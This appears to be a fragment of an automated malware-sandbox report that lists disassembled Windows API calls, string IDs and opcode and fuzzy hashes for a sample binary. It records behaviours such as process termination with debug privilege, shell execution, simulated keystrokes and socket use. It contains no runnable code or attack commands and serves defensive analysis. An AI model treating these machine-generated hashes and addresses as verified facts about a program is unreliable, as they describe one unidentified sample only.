                                                                                • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 004128A1
                                                                                • CloseHandle.KERNEL32(?), ref: 004128D0
                                                                                • CloseHandle.KERNEL32(?), ref: 00412947
                                                                                Similarity
                                                                                • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                • String ID:
                                                                                • API String ID: 4090791747-0
                                                                                APIs
                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0041B3F4
                                                                                Similarity
                                                                                • API ID: InvalidateRect
                                                                                • String ID:
                                                                                • API String ID: 634782764-0
                                                                                APIs
                                                                                • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0042DB1B
                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0042DB3C
                                                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0042DB51
                                                                                • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0042DB6E
                                                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0042DB95
                                                                                • DestroyIcon.USER32(00000000,?,?,?,?,?,?,003CA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0042DBA0
                                                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0042DBBD
                                                                                • DestroyIcon.USER32(00000000,?,?,?,?,?,?,003CA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0042DBC8
                                                                                Similarity
                                                                                • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                • String ID:
                                                                                • API String ID: 1268354404-0
                                                                                APIs
                                                                                  • Part of subcall function 003F6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003F5FA6,?), ref: 003F6ED8
                                                                                  • Part of subcall function 003F6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003F5FA6,?), ref: 003F6EF1
                                                                                  • Part of subcall function 003F72CB: GetFileAttributesW.KERNEL32(?,003F6019), ref: 003F72CC
                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 003F75CA
                                                                                • _wcscmp.LIBCMT ref: 003F75E2
                                                                                • MoveFileW.KERNEL32(?,?), ref: 003F75FB
                                                                                Similarity
                                                                                • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 793581249-0
                                                                                APIs
                                                                                • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0042DAD1,00000004,00000000,00000000), ref: 003CEAEB
                                                                                • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0042DAD1,00000004,00000000,00000000), ref: 003CEB32
                                                                                • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0042DAD1,00000004,00000000,00000000), ref: 0042DC86
                                                                                • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0042DAD1,00000004,00000000,00000000), ref: 0042DCF2
                                                                                Similarity
                                                                                • API ID: ShowWindow
                                                                                • String ID:
                                                                                • API String ID: 1268545403-0
                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,003EAEF1,00000B00,?,?), ref: 003EB26C
                                                                                • HeapAlloc.KERNEL32(00000000,?,003EAEF1,00000B00,?,?), ref: 003EB273
                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,003EAEF1,00000B00,?,?), ref: 003EB288
                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,003EAEF1,00000B00,?,?), ref: 003EB290
                                                                                • DuplicateHandle.KERNEL32(00000000,?,003EAEF1,00000B00,?,?), ref: 003EB293
                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,003EAEF1,00000B00,?,?), ref: 003EB2A3
                                                                                • GetCurrentProcess.KERNEL32(003EAEF1,00000000,?,003EAEF1,00000B00,?,?), ref: 003EB2AB
                                                                                • DuplicateHandle.KERNEL32(00000000,?,003EAEF1,00000B00,?,?), ref: 003EB2AE
                                                                                • CreateThread.KERNEL32(00000000,00000000,003EB2D4,00000000,00000000,00000000), ref: 003EB2C8
                                                                                Similarity
                                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                • String ID:
                                                                                • API String ID: 1957940570-0
                                                                                Strings
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                                • API String ID: 0-572801152
                                                                                APIs
                                                                                  • Part of subcall function 003B936C: __swprintf.LIBCMT ref: 003B93AB
                                                                                  • Part of subcall function 003B936C: __itow.LIBCMT ref: 003B93DF
                                                                                  • Part of subcall function 003CC6F4: _wcscpy.LIBCMT ref: 003CC717
                                                                                • _wcstok.LIBCMT ref: 0040184E
                                                                                • _wcscpy.LIBCMT ref: 004018DD
                                                                                • _memset.LIBCMT ref: 00401910
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                • String ID: X$p2Fl2F
                                                                                • API String ID: 774024439-2242726339
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00419B19
                                                                                • SendMessageW.USER32(?,00001036,00000000,?), ref: 00419B2D
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00419B47
                                                                                • _wcscat.LIBCMT ref: 00419BA2
                                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 00419BB9
                                                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00419BE7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window_wcscat
                                                                                • String ID: SysListView32
                                                                                • API String ID: 307300125-78025650
                                                                                • Opcode ID: 670ee43d69decd848c83c31c1a662b2edc9e5bcb84a3175d4f48d28d67c49b31
                                                                                • Instruction ID: e13876714f07d2e74d8fbe3fbcccd6dbf89ab6f32308230545e84fc41a47a02b
                                                                                • Opcode Fuzzy Hash: 670ee43d69decd848c83c31c1a662b2edc9e5bcb84a3175d4f48d28d67c49b31
                                                                                • Instruction Fuzzy Hash: EC41A171A00348ABDB219FA4DC85FEF77A8EF08350F10442BF589A7291D7799D85CB68
                                                                                APIs
                                                                                  • Part of subcall function 003F6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 003F6554
                                                                                  • Part of subcall function 003F6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 003F6564
                                                                                  • Part of subcall function 003F6532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 003F65F9
                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0041179A
                                                                                • GetLastError.KERNEL32 ref: 004117AD
                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004117D9
                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00411855
                                                                                • GetLastError.KERNEL32(00000000), ref: 00411860
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00411895
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                • String ID: SeDebugPrivilege
                                                                                • API String ID: 2533919879-2896544425
                                                                                • Opcode ID: 651f5328f97fa1d93902021ed1a6d8738e233d5889263ac89592f1cffadd2ade
                                                                                • Instruction ID: 38dd913db6c87b39162bc303a93d472ecd93b14b8dc1a3bc5b7c7dcd43a77cd0
                                                                                • Opcode Fuzzy Hash: 651f5328f97fa1d93902021ed1a6d8738e233d5889263ac89592f1cffadd2ade
                                                                                • Instruction Fuzzy Hash: FD419E71600205AFDB06EF54C895FBEB7A1AF54310F04C05AFA069F3E2DB78A9418B59
                                                                                APIs
                                                                                • LoadIconW.USER32(00000000,00007F03), ref: 003F58B8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: IconLoad
                                                                                • String ID: blank$info$question$stop$warning
                                                                                • API String ID: 2457776203-404129466
                                                                                • Opcode ID: feea46f3995ec87f2b0f66c94d82763566723d3a8dd7d68844c73ba604589aa5
                                                                                • Instruction ID: 6398aba8573158ccfa45e0ff94861f1434c0c9d15e7797907366f3237b2bc4c0
                                                                                • Opcode Fuzzy Hash: feea46f3995ec87f2b0f66c94d82763566723d3a8dd7d68844c73ba604589aa5
                                                                                • Instruction Fuzzy Hash: A611EE3270974ABAE7175F54EC42E7A379CAF25764F30003BF751A5781E76499004269
                                                                                APIs
                                                                                • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 003FA806
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ArraySafeVartype
                                                                                • String ID:
                                                                                • API String ID: 1725837607-0
                                                                                • Opcode ID: 7fed48bca004d1fddfa124d5562ea7bfb9171c55fb25da3088d7c6ab9a393540
                                                                                • Instruction ID: 145a86f3145942c8e5edfc25b8c06fcf0b4b14596983978b21a5412a32a841f1
                                                                                • Opcode Fuzzy Hash: 7fed48bca004d1fddfa124d5562ea7bfb9171c55fb25da3088d7c6ab9a393540
                                                                                • Instruction Fuzzy Hash: F9C18BB5A0461A9FDB06DF98D481BBEB7F4EF08311F20806AE619EB341C774A945CB91
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 003F6B63
                                                                                • LoadStringW.USER32(00000000), ref: 003F6B6A
                                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 003F6B80
                                                                                • LoadStringW.USER32(00000000), ref: 003F6B87
                                                                                • _wprintf.LIBCMT ref: 003F6BAD
                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003F6BCB
                                                                                Strings
                                                                                • %s (%d) : ==> %s: %s %s, xrefs: 003F6BA8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                                                • String ID: %s (%d) : ==> %s: %s %s
                                                                                • API String ID: 3648134473-3128320259
                                                                                • Opcode ID: 625cf697cee595bbecef13728b8fa2d09277652b57b748178800f354a4206063
                                                                                • Instruction ID: e64334a8e2b0622218d54874b24134b160ebcc07e67ffcbbdf0e8ef34a545ac7
                                                                                • Opcode Fuzzy Hash: 625cf697cee595bbecef13728b8fa2d09277652b57b748178800f354a4206063
                                                                                • Instruction Fuzzy Hash: 8B0186F2D002087FEB11ABD0AD89EF7336CD704304F0044A2B745D2141EA749E848F74
                                                                                APIs
                                                                                  • Part of subcall function 00413C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00412BB5,?,?), ref: 00413C1D
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00412BF6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharConnectRegistryUpper
                                                                                • String ID:
                                                                                • API String ID: 2595220575-0
                                                                                • Opcode ID: f7e3e8d590fc3d02451b1b3a21ba5364b276f0db8de8207cb8f9cc70bd91de53
                                                                                • Instruction ID: f1219d7924cde9bff42282bb7b1523433c50d61b3eb9f98c258a62c0b0bb7b88
                                                                                • Opcode Fuzzy Hash: f7e3e8d590fc3d02451b1b3a21ba5364b276f0db8de8207cb8f9cc70bd91de53
                                                                                • Instruction Fuzzy Hash: 9A9188316042009FCB11EF14D981FAEB7E5FF88314F04881EFA969B2A1DB74E955CB46
                                                                                APIs
                                                                                • select.WSOCK32 ref: 00409691
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0040969E
                                                                                • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 004096C8
                                                                                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 004096E9
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 004096F8
                                                                                • htons.WSOCK32(?,?,?,00000000,?), ref: 004097AA
                                                                                • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0044DC00), ref: 00409765
                                                                                  • Part of subcall function 003ED2FF: _strlen.LIBCMT ref: 003ED309
                                                                                • _strlen.LIBCMT ref: 00409800
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                                                • String ID:
                                                                                • API String ID: 3480843537-0
                                                                                • Opcode ID: a5b886b62158ca64b9f3926adf9a31569eced090ab4c1bfb7e7c2ddadeb01a7c
                                                                                • Instruction ID: 28fbabe5c2d53f2e9079490936a3ed59e3f968ed608b19ad9d7d94af76a6c809
                                                                                • Opcode Fuzzy Hash: a5b886b62158ca64b9f3926adf9a31569eced090ab4c1bfb7e7c2ddadeb01a7c
                                                                                • Instruction Fuzzy Hash: FA81CF32504200ABC715EF64CC85F6BB7A8EF85714F104A2EF655AB2D2EB34DD05CB96
                                                                                APIs
                                                                                • __mtinitlocknum.LIBCMT ref: 003DA991
                                                                                  • Part of subcall function 003D7D7C: __FF_MSGBANNER.LIBCMT ref: 003D7D91
                                                                                  • Part of subcall function 003D7D7C: __NMSG_WRITE.LIBCMT ref: 003D7D98
                                                                                  • Part of subcall function 003D7D7C: __malloc_crt.LIBCMT ref: 003D7DB8
                                                                                • __lock.LIBCMT ref: 003DA9A4
                                                                                • __lock.LIBCMT ref: 003DA9F0
                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00466DE0,00000018,003E5E7B,?,00000000,00000109), ref: 003DAA0C
                                                                                • EnterCriticalSection.KERNEL32(8000000C,00466DE0,00000018,003E5E7B,?,00000000,00000109), ref: 003DAA29
                                                                                • LeaveCriticalSection.KERNEL32(8000000C), ref: 003DAA39
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                • String ID:
                                                                                • API String ID: 1422805418-0
                                                                                • Opcode ID: 9adf906d10f6e2e3747e4e07160145ecf07b868f1f24b1da7e31443ee82fd6ce
                                                                                • Instruction ID: 8ec958254a01d2d318d6ddffe1c6cd8bb44bebb14603198da903a1f5d6214815
                                                                                • Opcode Fuzzy Hash: 9adf906d10f6e2e3747e4e07160145ecf07b868f1f24b1da7e31443ee82fd6ce
                                                                                • Instruction Fuzzy Hash: 084136B3901A059BEB118F68EB41799B7B0AF01324F21832BE529AB3D1D7749C41CB86
                                                                                APIs
                                                                                • DeleteObject.GDI32(00000000), ref: 00418EE4
                                                                                • GetDC.USER32(00000000), ref: 00418EEC
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00418EF7
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00418F03
                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00418F3F
                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00418F50
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0041BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00418F8A
                                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00418FAA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 3864802216-0
                                                                                • Opcode ID: 2a64321c9f0cf32092f90ab941d6ffc2d0c20d43fffffbf2990de18223362795
                                                                                • Instruction ID: 2e3920c925ca59269da0123b86e3898c68f7682ec307cc5ab0424efc4666e234
                                                                                • Opcode Fuzzy Hash: 2a64321c9f0cf32092f90ab941d6ffc2d0c20d43fffffbf2990de18223362795
                                                                                • Instruction Fuzzy Hash: A3318072600614BFEB108F50DC4AFEB3BADEF49715F045065FE09DA291C6799842CB78
APIs
  • Part of subcall function 003CB34E: GetWindowLongW.USER32(?,000000EB), ref: 003CB35F
• GetSystemMetrics.USER32(0000000F), ref: 0042016D
• MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0042038D
• SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 004203AB
• InvalidateRect.USER32(?,00000000,00000001,?), ref: 004203D6
• SendMessageW.USER32(00000003,00000469,?,00000000), ref: 004203FF
• ShowWindow.USER32(00000003,00000000), ref: 00420421
• DefDlgProcW.USER32(?,00000005,?,?), ref: 00420440
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
• String ID:
• API String ID: 3356174886-0
• Opcode ID: 2e8290a91f3e16351f53736aaac25ee3c832a263467958537427d215bf17ca95
• Instruction ID: ba40269e98802ec6e450fd1875d29861f2e0e0d8225706d5cc5e9d57d295fcdd
• Opcode Fuzzy Hash: 2e8290a91f3e16351f53736aaac25ee3c832a263467958537427d215bf17ca95
• Instruction Fuzzy Hash: BEA1AD35700626EFDB18CF68D9897AEBBF1BF04700F548166EC54A6291D738AD60CB94
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3cb8a09c010a4f9156c15d8a5cc82c4cde55a20ad8b5ba257cbd422299dbdf2f
• Instruction ID: b988e3c41efb8714ca0f68b98eceffde1cc3f42eba6a1223dcb132c674492409
• Opcode Fuzzy Hash: 3cb8a09c010a4f9156c15d8a5cc82c4cde55a20ad8b5ba257cbd422299dbdf2f
• Instruction Fuzzy Hash: 937167B1900519EFCB05CF98CC89EAEBB78FF85318F24815DF915AA251C734AE11CBA5
APIs
• _memset.LIBCMT ref: 0041225A
• _memset.LIBCMT ref: 00412323
• ShellExecuteExW.SHELL32(?), ref: 00412368
  • Part of subcall function 003B936C: __swprintf.LIBCMT ref: 003B93AB
  • Part of subcall function 003B936C: __itow.LIBCMT ref: 003B93DF
  • Part of subcall function 003CC6F4: _wcscpy.LIBCMT ref: 003CC717
• CloseHandle.KERNEL32(00000000), ref: 0041242F
• FreeLibrary.KERNEL32(00000000), ref: 0041243E
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
• String ID: @
• API String ID: 4082843840-2766056989
• Opcode ID: 99f033a18791511c926f690122c18f9e96747994a73dd3bf5cc213dcd2904082
• Instruction ID: 1d9a2374a62bec075556c9c7b030e83c735bd72f767aa251e03f3ab8a5f31c12
• Opcode Fuzzy Hash: 99f033a18791511c926f690122c18f9e96747994a73dd3bf5cc213dcd2904082
• Instruction Fuzzy Hash: DE71BF74A006199FCF05EFA4C981AEEB7F5FF08300F00806AE959AB751CB74AD50CB98
APIs
• GetParent.USER32(00000000), ref: 003F3C02
• GetKeyboardState.USER32(?), ref: 003F3C17
• SetKeyboardState.USER32(?), ref: 003F3C78
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 003F3CA4
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 003F3CC1
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 003F3D05
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 003F3D26
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 4034769b4798d543c208e8b170e013e0fb17e5bd52cb76f0430d4d4b4b68b963
• Instruction ID: 9f7b491891911c02eb9e0376f56a6cca393b322641764777b2cf8f54571074bd
• Opcode Fuzzy Hash: 4034769b4798d543c208e8b170e013e0fb17e5bd52cb76f0430d4d4b4b68b963
• Instruction Fuzzy Hash: F651F8A05047D93DFB378374CC55BBABF996F06300F088489F2D55A8C2D694EE94E760
APIs
• GetCursorPos.USER32(000000FF), ref: 003CB64F
• ScreenToClient.USER32(00000000,000000FF), ref: 003CB66C
• GetAsyncKeyState.USER32(00000001), ref: 003CB691
• GetAsyncKeyState.USER32(00000002), ref: 003CB69F
Strings
